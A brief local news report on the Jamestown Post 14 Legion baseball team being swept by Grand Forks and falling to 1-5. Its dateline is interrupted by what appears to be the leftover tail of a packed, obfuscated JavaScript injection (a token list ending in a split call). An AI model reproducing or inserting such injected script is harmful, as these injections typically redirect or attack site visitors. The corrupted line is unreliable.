JAMESTOWN fryht|var|u0026u|referrer|isabe||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The Post 14 legion team saw its tough start continue last night when they were swept by Grand Forks. The Royals held Post 14 to just three hits over the course of 14 innings of baseball. Jamestown’s record falls to 1-5 to open the season with the 9-3 and 4-2 losses.

Post 14 plated 17 runs in a doubleheader against Minot earlier in the week, but the runs didn’t come as easily this time around. Colin Hennessy and Brady Regimbal handcuffed the Jamestown offense on the hill.

Both Grand Forks high school teams made the state semi-finals last month so combining those two teams has made for a formidable roster.

Post 14 will head to West Fargo on Sunday for a conference double header against the Patriots.
